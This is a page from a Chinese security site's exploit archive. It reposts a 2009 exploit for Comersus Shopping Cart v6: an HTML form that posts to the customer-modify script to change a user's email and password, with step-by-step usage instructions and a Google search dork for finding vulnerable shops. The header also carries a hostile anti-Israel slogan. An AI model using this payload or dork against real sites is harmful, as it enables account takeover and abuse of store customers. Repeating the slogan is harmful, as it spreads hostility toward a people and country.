首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Comersus Shopping Cart <= v6 Remote User Pass Exploit
来源:www.vfcocus.net 作者:ajann 发布时间:2009-01-13  
*******************************************************************************
# Title   :  Comersus Shopping Cart <= v6 Remote User Pass Exploit
# Author  :  "ajann" from Turkey
# Contact :   :(
# S.Page  :  http://www.comersus.com/
# $$      :  Free
# Dork    :  Powered by Comersus v6 Shopping Cart
# DorkEx  :

http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta=

KAHROLSUN ISRAEL

-Register Site
-Login
-Open Exploit
-Edit: User Email , User Password
-Submit Form

*******************************************************************************

<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp">
  <table width="421" border="0"> 
      <tr>
     
    </tr>
    <tr>
      <td width="168">Name</td>
      <td width="220">     
        <input type=text name=customerName value="test">
      </td>
    </tr>   
    <tr>
      <td width="168">Last Name</td>
      <td width="220">     
        <input type=text name=lastName value="test">
      </td>
    </tr>
    <tr>
      <td width="168">Company</td>
      <td width="220">     
        <input type=text name=customerCompany value="test">
      </td>
    </tr>
    <tr>
      <td width="168">Phone</td>
      <td width="220">       
       <input type=text name=phone value="123456789">
      </td>
    </tr>
    <tr>
      <td width="168"><strong>Email</strong></td>
      <td width="220">  
   
        <input type="text" name="email" value="Please Add Mail">
        Edit
      </td>
    </tr>
    <tr>
      <td width="168"><strong>Password</strong></td>
      <td width="220">        
        <input type=text name=password value="Please Add Pass">
        Edit
      </td>
    </tr>
    <tr>
      <td width="168">Address</td>
      <td width="220">        
        <input type=text name=address value="test">
      </td>
    </tr>
    <tr>
      <td width="168">Zip</td>
      <td width="220">        
        <input type=text name=zip value="08050">
      </td>
    </tr>
    <tr>
      <td width="168">State</td>
      <td width="220">        
       
      <SELECT name=stateCode size=1>
      <OPTION value="">Select the state
        <option value="1">Please Type County below
      </OPTION>
      </SELECT>
      </td>
    </tr>
    <tr>
      <td width="168">Non listed state</td>
      <td width="220">        
       <input type=text name=state value="">
      </td>
    </tr>
    <tr>
      <td width="168">City</td>
      <td width="220">        
        <input type=text name=city value="test">
      </td>
    </tr>   
    <tr>
      <td width="168">Country</td>
      <td width="220">                
       
      <SELECT name=countryCode>
      <OPTION value="">Select the country
        <option value="AF" selected>AFGHANISTAN
      </OPTION>
      </SELECT>      
      </td>
    </tr>
   
   
   
    <tr>
      <td width="168">&nbsp;</td>
      <td width="220">&nbsp;</td>
    </tr>
    <tr>
      <td colspan="2">       
          <input type="submit" name="Modify" value="Modify">                           
      </td>
    </tr>
    </table>
   </form>         
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Simple Machines Forum - Destro
·Triologic Media Player 7 (.m3u
·Silentum Uploader 1.4.0 Remote
·ExcelOCX ActiveX 3.2 (Download
·Microsoft HTML Workshop <= 4.7
·Winamp <= 5.541 (mp3/aiff) Mul
·Microsoft HTML Workshop <= 4.7
·phpMDJ <= 1.0.3 (id_animateur)
·VUPlayer 2.49 .ASX File (Unive
·Browse3D 3.5 (.sfs File) Local
·Word Viewer OCX 3.2 ActiveX (S
·MS Windows (.CHM File) Denial
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved